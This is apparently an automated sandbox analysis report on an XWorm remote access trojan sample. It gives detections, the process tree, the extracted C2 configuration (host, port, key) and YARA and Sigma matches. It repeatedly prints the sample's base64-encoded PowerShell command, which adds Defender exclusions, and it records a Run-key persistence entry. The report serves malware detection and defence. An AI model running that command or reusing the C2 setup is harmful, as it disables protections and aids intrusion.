Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test2.exe.bin.exe

Overview

General Information

Sample name:test2.exe.bin.exe
Analysis ID:1639881
MD5:2aa459d8249147d19837b06c8640a950
SHA1:38d8e8405b5efa19120d93b67a95ca03d0da3696
SHA256:1a6ad2dbd06aa2cd83a7275e492b9c98388243f1dd10e96394933251480acad5
Tags:exeuser-TornadoAV_dev
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • test2.exe.bin.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\test2.exe.bin.exe" MD5: 2AA459D8249147D19837B06C8640A950)
    • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • XClient.exe (PID: 7840 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 4D152B9AAAEC95BD696369CE3793BBF5)
  • Music.UI.exe (PID: 7992 cmdline: "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca MD5: F963F75C0AD152437E10D656A00793A3)
  • svchost.exe (PID: 7568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 8988 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • OpenWith.exe (PID: 9092 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["Dyno15-41078.portmap.host"], "Port": 41078, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\testJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\testrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0xc225:$str01: $VB$Local_Port
    • 0xc249:$str02: $VB$Local_Host
    • 0xa47e:$str03: get_Jpeg
    • 0xad21:$str04: get_ServicePack
    • 0xd092:$str05: Select * from AntivirusProduct
    • 0xd530:$str06: PCRestart
    • 0xd544:$str07: shutdown.exe /f /r /t 0
    • 0xd5f6:$str08: StopReport
    • 0xd5cc:$str09: StopDDos
    • 0xd6c2:$str10: sendPlugin
    • 0xd860:$str12: -ExecutionPolicy Bypass -File "
    • 0xdb69:$str13: Content-length: 5235
    C:\Users\user\AppData\Local\Temp\testMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xe4b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xe553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xe668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xda84:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\XClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xc225:$str01: $VB$Local_Port
      • 0xc249:$str02: $VB$Local_Host
      • 0xa47e:$str03: get_Jpeg
      • 0xad21:$str04: get_ServicePack
      • 0xd092:$str05: Select * from AntivirusProduct
      • 0xd530:$str06: PCRestart
      • 0xd544:$str07: shutdown.exe /f /r /t 0
      • 0xd5f6:$str08: StopReport
      • 0xd5cc:$str09: StopDDos
      • 0xd6c2:$str10: sendPlugin
      • 0xd860:$str12: -ExecutionPolicy Bypass -File "
      • 0xdb69:$str13: Content-length: 5235
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xe4fe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xe59b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xe6b0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xdacc:$cnc4: POST / HTTP/1.1
        00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xe2b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xe353:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xe468:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xd884:$cnc4: POST / HTTP/1.1
          Process Memory Space: test2.exe.bin.exe PID: 7744JoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.XClient.exe.190000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              3.0.XClient.exe.190000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0xc225:$str01: $VB$Local_Port
              • 0xc249:$str02: $VB$Local_Host
              • 0xa47e:$str03: get_Jpeg
              • 0xad21:$str04: get_ServicePack
              • 0xd092:$str05: Select * from AntivirusProduct
              • 0xd530:$str06: PCRestart
              • 0xd544:$str07: shutdown.exe /f /r /t 0
              • 0xd5f6:$str08: StopReport
              • 0xd5cc:$str09: StopDDos
              • 0xd6c2:$str10: sendPlugin
              • 0xd860:$str12: -ExecutionPolicy Bypass -File "
              • 0xdb69:$str13: Content-length: 5235
              3.0.XClient.exe.190000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xe4b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xe553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xe668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xda84:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\test, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\test, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7568, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-16T13:10:49.951717+010028531931Malware Command and Control Activity Detected192.168.2.449773193.161.193.9941078TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: test2.exe.bin.exeAvira: detected
              Antivirus detection for URL or domain
              Source: Dyno15-41078.portmap.hostAvira URL Cloud: Label: malware
              Source: http://ns.adobe.om/Avira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\testAvira: detection malicious, Label: TR/Spy.Gen
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
              Found malware configuration
              Source: 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["Dyno15-41078.portmap.host"], "Port": 41078, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeReversingLabs: Detection: 91%
              Source: C:\Users\user\AppData\Local\Temp\testReversingLabs: Detection: 91%
              Multi AV Scanner detection for submitted file
              Source: test2.exe.bin.exeVirustotal: Detection: 69%Perma Link
              Source: test2.exe.bin.exeReversingLabs: Detection: 80%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: Dyno15-41078.portmap.host
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: 41078
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: <123456789>
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: <Xwormmm>
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: XWorm V5.6
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: USB.exe
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: %Temp%
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString decryptor: test
              Source: test2.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 92.123.20.9:443 -> 192.168.2.4:49710 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49773 -> 193.161.193.99:41078
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: Dyno15-41078.portmap.host
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 193.161.193.99 ports 41078,0,1,4,7,8
              Source: global trafficTCP traffic: 192.168.2.4:49711 -> 193.161.193.99:41078
              Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
              Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /XBLWinClient/v10_music/configuration.xml HTTP/1.1Accept: */*User-Agent: XBLWIN10.19071Accept-Language: en-CHAccept-Encoding: gzip, deflate, brHost: settings-ssl.xboxlive.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: settings-ssl.xboxlive.com
              Source: global trafficDNS traffic detected: DNS query: Dyno15-41078.portmap.host
              Source: svchost.exe, 00000007.00000002.2862185954.000002CC6B400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B2CD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std1.
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adob/
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.om/
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeTy
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoe.cf
              Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.aobe
              Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1270956390.000000000581C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1270956390.0000000005990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
